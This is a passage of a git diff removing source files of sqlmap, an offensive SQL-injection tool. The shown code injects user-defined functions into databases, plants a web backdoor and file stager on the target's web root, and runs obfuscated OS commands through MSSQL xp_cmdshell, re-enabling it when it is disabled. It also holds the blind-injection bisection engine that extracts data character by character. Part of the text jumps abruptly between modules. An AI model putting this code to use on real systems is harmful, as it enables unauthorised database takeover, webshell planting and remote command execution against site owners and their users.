" % (x + 1) - udfName = readInput(msg) - - if udfName: - self.udfs[udfName] = {} - break - else: - logger.warn("you need to specify the name of the UDF") - - if Backend.isDbms(DBMS.MYSQL): - defaultType = "string" - elif Backend.isDbms(DBMS.PGSQL): - defaultType = "text" - - self.udfs[udfName]["input"] = [] - - default = 1 - msg = "how many input parameters takes UDF " - msg += "'%s'? (default: %d) " % (udfName, default) - - while True: - parCount = readInput(msg, default=default) - - if isinstance(parCount, basestring) and parCount.isdigit() and int(parCount) >= 0: - parCount = int(parCount) - break - - elif isinstance(parCount, int): - break - - else: - logger.warn("invalid value, only digits >= 0 are allowed") - - for y in xrange(0, parCount): - msg = "what is the data-type of input parameter " - msg += "number %d? (default: %s) " % ((y + 1), defaultType) - - while True: - parType = readInput(msg, default=defaultType) - - if isinstance(parType, basestring) and parType.isdigit(): - logger.warn("you need to specify the data-type of the parameter") - - else: - self.udfs[udfName]["input"].append(parType) - break - - msg = "what is the data-type of the return " - msg += "value? (default: %s) " % defaultType - - while True: - retType = readInput(msg, default=defaultType) - - if isinstance(retType, basestring) and retType.isdigit(): - logger.warn("you need to specify the data-type of the return value") - else: - self.udfs[udfName]["return"] = retType - break - - success = self.udfInjectCore(self.udfs) - - if success is False: - self.cleanup(udfDict=self.udfs) - return False - - msg = "do you want to call your injected user-defined " - msg += "functions now? [Y/n/q] " - choice = readInput(msg, default="Y") - - if choice[0] in ("n", "N"): - self.cleanup(udfDict=self.udfs) - return - elif choice[0] in ("q", "Q"): - self.cleanup(udfDict=self.udfs) - raise SqlmapUserQuitException - - while True: - udfList = [] - msg = "which UDF do you want to call?" 
- - for udf in self.udfs.keys(): - udfList.append(udf) - msg += "\n[%d] %s" % (len(udfList), udf) - - msg += "\n[q] Quit" - - while True: - choice = readInput(msg) - - if choice and choice[0] in ("q", "Q"): - break - elif isinstance(choice, basestring) and choice.isdigit() and int(choice) > 0 and int(choice) <= len(udfList): - choice = int(choice) - break - elif isinstance(choice, int) and choice > 0 and choice <= len(udfList): - break - else: - warnMsg = "invalid value, only digits >= 1 and " - warnMsg += "<= %d are allowed" % len(udfList) - logger.warn(warnMsg) - - if not isinstance(choice, int): - break - - cmd = "" - count = 1 - udfToCall = udfList[choice - 1] - - for inp in self.udfs[udfToCall]["input"]: - msg = "what is the value of the parameter number " - msg += "%d (data-type: %s)? " % (count, inp) - - while True: - parValue = readInput(msg) - - if parValue: - if "int" not in inp and "bool" not in inp: - parValue = "'%s'" % parValue - - cmd += "%s," % parValue - - break - else: - logger.warn("you need to specify the value of the parameter") - - count += 1 - - cmd = cmd[:-1] - msg = "do you want to retrieve the return value of the " - msg += "UDF? [Y/n] " - choice = readInput(msg, default="Y") - - if choice[0] in ("y", "Y"): - output = self.udfEvalCmd(cmd, udfName=udfToCall) - - if output: - conf.dumper.string("return value", output) - else: - dataToStdout("No return value\n") - else: - self.udfExecCmd(cmd, udfName=udfToCall, silent=True) - - msg = "do you want to call this or another injected UDF? 
[Y/n] " - choice = readInput(msg, default="Y") - - if choice[0] not in ("y", "Y"): - break - - self.cleanup(udfDict=self.udfs) diff --git a/lib/takeover/web.py b/lib/takeover/web.py deleted file mode 100644 index 8fe7757d..00000000 --- a/lib/takeover/web.py +++ /dev/null @@ -1,358 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import posixpath -import re -import StringIO -import tempfile -import urlparse - -from extra.cloak.cloak import decloak -from lib.core.agent import agent -from lib.core.common import arrayizeValue -from lib.core.common import Backend -from lib.core.common import extractRegexResult -from lib.core.common import getAutoDirectories -from lib.core.common import getManualDirectories -from lib.core.common import getPublicTypeMembers -from lib.core.common import getSQLSnippet -from lib.core.common import getUnicode -from lib.core.common import ntToPosixSlashes -from lib.core.common import isTechniqueAvailable -from lib.core.common import isWindowsDriveLetterPath -from lib.core.common import normalizePath -from lib.core.common import posixToNtSlashes -from lib.core.common import randomInt -from lib.core.common import randomStr -from lib.core.common import readInput -from lib.core.common import singleTimeWarnMessage -from lib.core.convert import hexencode -from lib.core.convert import utf8encode -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import paths -from lib.core.enums import DBMS -from lib.core.enums import OS -from lib.core.enums import PAYLOAD -from lib.core.enums import WEB_API -from lib.core.exception import SqlmapNoneDataException -from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT -from lib.core.settings import EVENTVALIDATION_REGEX -from lib.core.settings import VIEWSTATE_REGEX -from lib.request.connect import Connect as Request -from 
thirdparty.oset.pyoset import oset - - -class Web: - """ - This class defines web-oriented OS takeover functionalities for - plugins. - """ - - def __init__(self): - self.webApi = None - self.webBaseUrl = None - self.webBackdoorUrl = None - self.webBackdoorFilePath = None - self.webStagerUrl = None - self.webStagerFilePath = None - self.webDirectory = None - - def webBackdoorRunCmd(self, cmd): - if self.webBackdoorUrl is None: - return - - output = None - - if not cmd: - cmd = conf.osCmd - - cmdUrl = "%s?cmd=%s" % (self.webBackdoorUrl, cmd) - page, _, _ = Request.getPage(url=cmdUrl, direct=True, silent=True, timeout=BACKDOOR_RUN_CMD_TIMEOUT) - - if page is not None: - output = re.search("
    (.+?)
    ", page, re.I | re.S) - - if output: - output = output.group(1) - - return output - - def webUpload(self, destFileName, directory, stream=None, content=None, filepath=None): - if filepath is not None: - if filepath.endswith('_'): - content = decloak(filepath) # cloaked file - else: - with open(filepath, "rb") as f: - content = f.read() - - if content is not None: - stream = StringIO.StringIO(content) # string content - - return self._webFileStreamUpload(stream, destFileName, directory) - - def _webFileStreamUpload(self, stream, destFileName, directory): - stream.seek(0) # Rewind - - try: - setattr(stream, "name", destFileName) - except TypeError: - pass - - if self.webApi in getPublicTypeMembers(WEB_API, True): - multipartParams = { - "upload": "1", - "file": stream, - "uploadDir": directory, - } - - if self.webApi == WEB_API.ASPX: - multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION - multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE - - page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False) - - if "File uploaded" not in page: - warnMsg = "unable to upload the file through the web file " - warnMsg += "stager to '%s'" % directory - logger.warn(warnMsg) - return False - else: - return True - else: - logger.error("sqlmap hasn't got a web backdoor nor a web file stager for %s" % self.webApi) - return False - - def _webFileInject(self, fileContent, fileName, directory): - outFile = posixpath.join(ntToPosixSlashes(directory), fileName) - uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory) - query = "" - - if isTechniqueAvailable(kb.technique): - where = kb.injection.data[kb.technique].where - - if where == PAYLOAD.WHERE.NEGATIVE: - randInt = randomInt() - query += "OR %d=%d " % (randInt, randInt) - - query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery)) - query = agent.prefixQuery(query) 
- query = agent.suffixQuery(query) - payload = agent.payload(newValue=query) - page = Request.queryPage(payload) - - return page - - def webInit(self): - """ - This method is used to write a web backdoor (agent) on a writable - remote directory within the web server document root. - """ - - if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webApi is not None: - return - - self.checkDbmsOs() - - default = None - choices = list(getPublicTypeMembers(WEB_API, True)) - - for ext in choices: - if conf.url.endswith(ext): - default = ext - break - - if not default: - default = WEB_API.ASP if Backend.isOs(OS.WINDOWS) else WEB_API.PHP - - message = "which web application language does the web server " - message += "support?\n" - - for count in xrange(len(choices)): - ext = choices[count] - message += "[%d] %s%s\n" % (count + 1, ext.upper(), (" (default)" if default == ext else "")) - - if default == ext: - default = count + 1 - - message = message[:-1] - - while True: - choice = readInput(message, default=str(default)) - - if not choice.isdigit(): - logger.warn("invalid value, only digits are allowed") - - elif int(choice) < 1 or int(choice) > len(choices): - logger.warn("invalid value, it must be between 1 and %d" % len(choices)) - - else: - self.webApi = choices[int(choice) - 1] - break - - directories = list(arrayizeValue(getManualDirectories())) - directories.extend(getAutoDirectories()) - directories = list(oset(directories)) - - backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi) - backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi)) - - stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi)) - - for directory in directories: - if not directory: - continue - - stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi) - self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName) - - uploaded = False - directory = 
ntToPosixSlashes(normalizePath(directory)) - - if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'): - directory = "/%s" % directory - else: - directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory - - if not directory.endswith('/'): - directory += '/' - - # Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method - infoMsg = "trying to upload the file stager on '%s' " % directory - infoMsg += "via LIMIT 'LINES TERMINATED BY' method" - logger.info(infoMsg) - self._webFileInject(stagerContent, stagerName, directory) - - for match in re.finditer('/', directory): - self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/')) - self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName) - debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl - logger.debug(debugMsg) - - uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) - uplPage = uplPage or "" - - if "sqlmap file uploader" in uplPage: - uploaded = True - break - - # Fall-back to UNION queries file upload method - if not uploaded: - warnMsg = "unable to upload the file stager " - warnMsg += "on '%s'" % directory - singleTimeWarnMessage(warnMsg) - - if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): - infoMsg = "trying to upload the file stager on '%s' " % directory - infoMsg += "via UNION method" - logger.info(infoMsg) - - stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi) - self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName) - - handle, filename = tempfile.mkstemp() - os.close(handle) - - with open(filename, "w+b") as f: - _ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi)) - _ = _.replace("WRITABLE_DIR", utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)) - f.write(_) - - self.unionWriteFile(filename, self.webStagerFilePath, "text", 
forceCheck=True) - - for match in re.finditer('/', directory): - self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/')) - self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName) - - debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl - logger.debug(debugMsg) - - uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) - uplPage = uplPage or "" - - if "sqlmap file uploader" in uplPage: - uploaded = True - break - - if not uploaded: - continue - - if "<%" in uplPage or "> \"%s\%s\"" % (tmpPath, randDestFile) - echoedLines.append(echoedLine) - - for echoedLine in echoedLines: - cmd += "%s & " % echoedLine - charCounter += len(echoedLine) - - if charCounter >= maxLen: - self.xpCmdshellExecCmd(cmd.rstrip(" & ")) - - cmd = "" - charCounter = 0 - - if cmd: - self.xpCmdshellExecCmd(cmd.rstrip(" & ")) - - def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None): - # When user provides DBMS credentials (with --dbms-cred) we need to - # redirect the command standard output to a temporary file in order - # to retrieve it afterwards - # NOTE: this does not need to be done when the command is 'del' to - # delete the temporary file - if conf.dbmsCred and insertIntoTable: - self.tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True)) - cmd = "%s > \"%s\"" % (cmd, self.tmpFile) - - # Obfuscate the command to execute, also useful to bypass filters - # on single-quotes - self._randStr = randomStr(lowercase=True) - self._cmd = "0x%s" % hexencode(cmd) - self._forgedCmd = "DECLARE @%s VARCHAR(8000);" % self._randStr - self._forgedCmd += "SET @%s=%s;" % (self._randStr, self._cmd) - - # Insert the command standard output into a support table, - # 'sqlmapoutput', except when DBMS credentials are provided because - # it does not work unfortunately, BULK INSERT needs to be used to - # retrieve the output when OPENROWSET is used hence the redirection - # 
to a temporary file from above - if insertIntoTable and not conf.dbmsCred: - self._forgedCmd += "INSERT INTO %s(data) " % insertIntoTable - - self._forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self._randStr) - - return agent.runAsDBMSUser(self._forgedCmd) - - def xpCmdshellExecCmd(self, cmd, silent=False): - return inject.goStacked(self.xpCmdshellForgeCmd(cmd), silent) - - def xpCmdshellEvalCmd(self, cmd, first=None, last=None): - output = None - - if conf.direct: - output = self.xpCmdshellExecCmd(cmd) - - if output and isinstance(output, (list, tuple)): - new_output = "" - - for line in output: - if line == "NULL": - new_output += "\n" - else: - new_output += "%s\n" % line.strip("\r") - - output = new_output - else: - inject.goStacked(self.xpCmdshellForgeCmd(cmd, self.cmdTblName)) - - # When user provides DBMS credentials (with --dbms-cred), the - # command standard output is redirected to a temporary file - # The file needs to be copied to the support table, - # 'sqlmapoutput' - if conf.dbmsCred: - inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, self.tmpFile, randomStr(10), randomStr(10))) - self.delRemoteFile(self.tmpFile) - - query = "SELECT %s FROM %s ORDER BY id" % (self.tblField, self.cmdTblName) - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - output = inject.getValue(query, resumeValue=False, blind=False, time=False) - - if (output is None) or len(output)==0 or output[0] is None: - output = [] - count = inject.getValue("SELECT COUNT(id) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if isNumPosStrValue(count): - for index in getLimitRange(count): - query = agent.limitQuery(index, query, self.tblField) - output.append(inject.getValue(query, union=False, error=False, resumeValue=False)) - - 
inject.goStacked("DELETE FROM %s" % self.cmdTblName) - - if output and isListLike(output) and len(output) > 1: - _ = "" - lines = [line for line in flattenValue(output) if line is not None] - - for i in xrange(len(lines)): - line = lines[i] or "" - if line is None or i in (0, len(lines) - 1) and not line.strip(): - continue - _ += "%s\n" % line - - output = _.rstrip('\n') - - return output - - def xpCmdshellInit(self): - if not kb.xpCmdshellAvailable: - infoMsg = "checking if xp_cmdshell extended procedure is " - infoMsg += "available, please wait.." - logger.info(infoMsg) - - result = self._xpCmdshellCheck() - - if result: - logger.info("xp_cmdshell extended procedure is available") - kb.xpCmdshellAvailable = True - - else: - message = "xp_cmdshell extended procedure does not seem to " - message += "be available. Do you want sqlmap to try to " - message += "re-enable it? [Y/n] " - choice = readInput(message, default="Y") - - if not choice or choice in ("y", "Y"): - self._xpCmdshellConfigure(1) - - if self._xpCmdshellCheck(): - logger.info("xp_cmdshell re-enabled successfully") - kb.xpCmdshellAvailable = True - - else: - logger.warn("xp_cmdshell re-enabling failed") - - logger.info("creating xp_cmdshell with sp_OACreate") - self._xpCmdshellConfigure(0) - self._xpCmdshellCreate() - - if self._xpCmdshellCheck(): - logger.info("xp_cmdshell created successfully") - kb.xpCmdshellAvailable = True - - else: - warnMsg = "xp_cmdshell creation failed, probably " - warnMsg += "because sp_OACreate is disabled" - logger.warn(warnMsg) - - hashDBWrite(HASHDB_KEYS.KB_XP_CMDSHELL_AVAILABLE, kb.xpCmdshellAvailable) - - if not kb.xpCmdshellAvailable: - errMsg = "unable to proceed without xp_cmdshell" - raise SqlmapUnsupportedFeatureException(errMsg) - - debugMsg = "creating a support table to write commands standard " - debugMsg += "output to" - logger.debug(debugMsg) - - # TEXT can't be used here because in error technique you get: - # "The text, ntext, and image data types cannot 
be compared or sorted" - self.createSupportTbl(self.cmdTblName, self.tblField, "NVARCHAR(4000)") - - self._xpCmdshellTest() diff --git a/lib/techniques/__init__.py b/lib/techniques/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/lib/techniques/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/techniques/blind/__init__.py b/lib/techniques/blind/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/lib/techniques/blind/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py deleted file mode 100644 index 41b54d7c..00000000 --- a/lib/techniques/blind/inference.py +++ /dev/null @@ -1,630 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re -import threading -import time - -from extra.safe2bin.safe2bin import safechardecode -from extra.safe2bin.safe2bin import safecharencode -from lib.core.agent import agent -from lib.core.common import Backend -from lib.core.common import calculateDeltaSeconds -from lib.core.common import dataToStdout -from lib.core.common import decodeHexValue -from lib.core.common import decodeIntToUnicode -from lib.core.common import filterControlChars -from lib.core.common import getCharset -from lib.core.common import getCounter -from lib.core.common import getUnicode -from lib.core.common import goGoodSamaritan -from lib.core.common import getPartRun -from lib.core.common import hashDBRetrieve -from lib.core.common import hashDBWrite -from lib.core.common import incrementCounter -from lib.core.common import 
randomInt -from lib.core.common import safeStringFormat -from lib.core.common import singleTimeWarnMessage -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.enums import ADJUST_TIME_DELAY -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import DBMS -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapThreadException -from lib.core.settings import CHAR_INFERENCE_MARK -from lib.core.settings import INFERENCE_BLANK_BREAK -from lib.core.settings import INFERENCE_UNKNOWN_CHAR -from lib.core.settings import INFERENCE_GREATER_CHAR -from lib.core.settings import INFERENCE_EQUALS_CHAR -from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR -from lib.core.settings import MIN_TIME_RESPONSES -from lib.core.settings import MAX_BISECTION_LENGTH -from lib.core.settings import MAX_TIME_REVALIDATION_STEPS -from lib.core.settings import NULL -from lib.core.settings import PARTIAL_HEX_VALUE_MARKER -from lib.core.settings import PARTIAL_VALUE_MARKER -from lib.core.settings import RANDOM_INTEGER_MARKER -from lib.core.settings import VALID_TIME_CHARS_RUN_THRESHOLD -from lib.core.threads import getCurrentThreadData -from lib.core.threads import runThreads -from lib.core.unescaper import unescaper -from lib.request.connect import Connect as Request -from lib.utils.progress import ProgressBar -from lib.utils.xrange import xrange - -def bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None, dump=False): - """ - Bisection algorithm that can be used to perform blind SQL injection - on an affected host - """ - - abortedFlag = False - showEta = False - partialValue = u"" - finalValue = None - retrievedLength = 0 - asciiTbl = getCharset(charsetType) - timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) - retVal = hashDBRetrieve(expression, checkConf=True) - - if retVal: - if 
PARTIAL_HEX_VALUE_MARKER in retVal: - retVal = retVal.replace(PARTIAL_HEX_VALUE_MARKER, "") - - if retVal and conf.hexConvert: - partialValue = retVal - infoMsg = "resuming partial value: %s" % safecharencode(partialValue) - logger.info(infoMsg) - elif PARTIAL_VALUE_MARKER in retVal: - retVal = retVal.replace(PARTIAL_VALUE_MARKER, "") - - if retVal and not conf.hexConvert: - partialValue = retVal - infoMsg = "resuming partial value: %s" % safecharencode(partialValue) - logger.info(infoMsg) - else: - infoMsg = "resumed: %s" % safecharencode(retVal) - logger.info(infoMsg) - - return 0, retVal - - try: - # Set kb.partRun in case "common prediction" feature (a.k.a. "good - # samaritan") is used or the engine is called from the API - if conf.predictOutput: - kb.partRun = getPartRun() - elif hasattr(conf, "api"): - kb.partRun = getPartRun(alias=False) - else: - kb.partRun = None - - if partialValue: - firstChar = len(partialValue) - elif "LENGTH(" in expression.upper() or "LEN(" in expression.upper(): - firstChar = 0 - elif dump and conf.firstChar is not None and (isinstance(conf.firstChar, int) or (isinstance(conf.firstChar, basestring) and conf.firstChar.isdigit())): - firstChar = int(conf.firstChar) - 1 - elif isinstance(firstChar, basestring) and firstChar.isdigit() or isinstance(firstChar, int): - firstChar = int(firstChar) - 1 - else: - firstChar = 0 - - if "LENGTH(" in expression.upper() or "LEN(" in expression.upper(): - lastChar = 0 - elif dump and conf.lastChar is not None and (isinstance(conf.lastChar, int) or (isinstance(conf.lastChar, basestring) and conf.lastChar.isdigit())): - lastChar = int(conf.lastChar) - elif isinstance(lastChar, basestring) and lastChar.isdigit() or isinstance(lastChar, int): - lastChar = int(lastChar) - else: - lastChar = 0 - - if Backend.getDbms(): - _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression) - nulledCastedField = agent.nullAndCastField(fieldToCastStr) - expressionReplaced = expression.replace(fieldToCastStr, 
nulledCastedField, 1) - expressionUnescaped = unescaper.escape(expressionReplaced) - else: - expressionUnescaped = unescaper.escape(expression) - - if isinstance(length, basestring) and length.isdigit() or isinstance(length, int): - length = int(length) - else: - length = None - - if length == 0: - return 0, "" - - if length and (lastChar > 0 or firstChar > 0): - length = min(length, lastChar or length) - firstChar - - if length and length > MAX_BISECTION_LENGTH: - length = None - - showEta = conf.eta and isinstance(length, int) - numThreads = min(conf.threads, length) - - if showEta: - progress = ProgressBar(maxValue=length) - - if timeBasedCompare and conf.threads > 1 and not conf.forceThreads: - warnMsg = "multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically" - singleTimeWarnMessage(warnMsg) - - if numThreads > 1: - if not timeBasedCompare or conf.forceThreads: - debugMsg = "starting %d thread%s" % (numThreads, ("s" if numThreads > 1 else "")) - logger.debug(debugMsg) - else: - numThreads = 1 - - if conf.threads == 1 and not timeBasedCompare and not conf.predictOutput: - warnMsg = "running in a single-thread mode. 
Please consider " - warnMsg += "usage of option '--threads' for faster data retrieval" - singleTimeWarnMessage(warnMsg) - - if conf.verbose in (1, 2) and not showEta and not hasattr(conf, "api"): - if isinstance(length, int) and conf.threads > 1: - dataToStdout("[%s] [INFO] retrieved: %s" % (time.strftime("%X"), "_" * min(length, conf.progressWidth))) - dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X")) - else: - dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X")) - - hintlock = threading.Lock() - - def tryHint(idx): - with hintlock: - hintValue = kb.hintValue - - if hintValue is not None and len(hintValue) >= idx: - if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.MAXDB, DBMS.DB2): - posValue = hintValue[idx - 1] - else: - posValue = ord(hintValue[idx - 1]) - - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue)) - result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) - - if result: - return hintValue[idx - 1] - - with hintlock: - kb.hintValue = None - - return None - - def validateChar(idx, value): - """ - Used in time-based inference (in case that original and retrieved - value are not equal there will be a deliberate delay). - """ - - if "'%s'" % CHAR_INFERENCE_MARK not in payload: - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx, value)) - else: - # e.g.: ... > '%c' -> ... > ORD(..) 
- markingValue = "'%s'" % CHAR_INFERENCE_MARK - unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(value)) - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue) - - result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) - - return not result - - def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None, retried=None): - """ - continuousOrder means that distance between each two neighbour's - numerical values is exactly 1 - """ - - result = tryHint(idx) - - if result: - return result - - if charTbl is None: - charTbl = type(asciiTbl)(asciiTbl) - - originalTbl = type(charTbl)(charTbl) - - if continuousOrder and shiftTable is None: - # Used for gradual expanding into unicode charspace - shiftTable = [2, 2, 3, 3, 5, 4] - - if "'%s'" % CHAR_INFERENCE_MARK in payload: - for char in ('\n', '\r'): - if ord(char) in charTbl: - charTbl.remove(ord(char)) - - if not charTbl: - return None - - elif len(charTbl) == 1: - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, charTbl[0])) - result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) - - if result: - return decodeIntToUnicode(charTbl[0]) - else: - return None - - maxChar = maxValue = charTbl[-1] - minChar = minValue = charTbl[0] - - while len(charTbl) != 1: - position = (len(charTbl) >> 1) - posValue = charTbl[position] - falsePayload = None - - if "'%s'" % CHAR_INFERENCE_MARK not in payload: - forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue)) - falsePayload = safeStringFormat(payload, (expressionUnescaped, idx, RANDOM_INTEGER_MARKER)) - else: - # e.g.: ... > '%c' -> ... > ORD(..) 
- markingValue = "'%s'" % CHAR_INFERENCE_MARK - unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(posValue)) - forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue) - falsePayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, NULL) - - if timeBasedCompare: - if kb.responseTimeMode: - kb.responseTimePayload = falsePayload - else: - kb.responseTimePayload = None - - result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) - - if result: - minValue = posValue - - if type(charTbl) != xrange: - charTbl = charTbl[position:] - else: - # xrange() - extended virtual charset used for memory/space optimization - charTbl = xrange(charTbl[position], charTbl[-1] + 1) - else: - maxValue = posValue - - if type(charTbl) != xrange: - charTbl = charTbl[:position] - else: - charTbl = xrange(charTbl[0], charTbl[position]) - - if len(charTbl) == 1: - if continuousOrder: - if maxValue == 1: - return None - - # Going beyond the original charset - elif minValue == maxChar: - # If the original charTbl was [0,..,127] new one - # will be [128,..,(128 << 4) - 1] or from 128 to 2047 - # and instead of making a HUGE list with all the - # elements we use a xrange, which is a virtual - # list - if expand and shiftTable: - charTbl = xrange(maxChar + 1, (maxChar + 1) << shiftTable.pop()) - originalTbl = xrange(charTbl) - maxChar = maxValue = charTbl[-1] - minChar = minValue = charTbl[0] - else: - return None - else: - retVal = minValue + 1 - - if retVal in originalTbl or (retVal == ord('\n') and CHAR_INFERENCE_MARK in payload): - if timeBasedCompare and not validateChar(idx, retVal): - if not kb.originalTimeDelay: - kb.originalTimeDelay = conf.timeSec - - kb.timeValidCharsRun = 0 - if retried < MAX_TIME_REVALIDATION_STEPS: - errMsg = "invalid character detected. retrying.." 
- logger.error(errMsg) - - if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE: - conf.timeSec += 1 - warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '') - logger.warn(warnMsg) - - if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: - dbgMsg = "turning off time auto-adjustment mechanism" - logger.debug(dbgMsg) - kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO - - return getChar(idx, originalTbl, continuousOrder, expand, shiftTable, (retried or 0) + 1) - else: - errMsg = "unable to properly validate last character value ('%s').." % decodeIntToUnicode(retVal) - logger.error(errMsg) - conf.timeSec = kb.originalTimeDelay - return decodeIntToUnicode(retVal) - else: - if timeBasedCompare: - kb.timeValidCharsRun += 1 - if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and kb.timeValidCharsRun > VALID_TIME_CHARS_RUN_THRESHOLD: - dbgMsg = "turning back on time auto-adjustment mechanism" - logger.debug(dbgMsg) - kb.adjustTimeDelay = ADJUST_TIME_DELAY.YES - - return decodeIntToUnicode(retVal) - else: - return None - else: - if minValue == maxChar or maxValue == minChar: - return None - - for index in xrange(len(originalTbl)): - if originalTbl[index] == minValue: - break - - # If we are working with non-continuous elements, both minValue and character after - # are possible candidates - for retVal in (originalTbl[index], originalTbl[index + 1]): - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, retVal)) - result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) - - if result: - return decodeIntToUnicode(retVal) - - return None - - # Go multi-threading (--threads > 1) - if conf.threads > 1 and isinstance(length, int) and length > 1: - threadData = getCurrentThreadData() - - threadData.shared.value = [None] * length - threadData.shared.index = [firstChar] # As list for python nested function scoping 
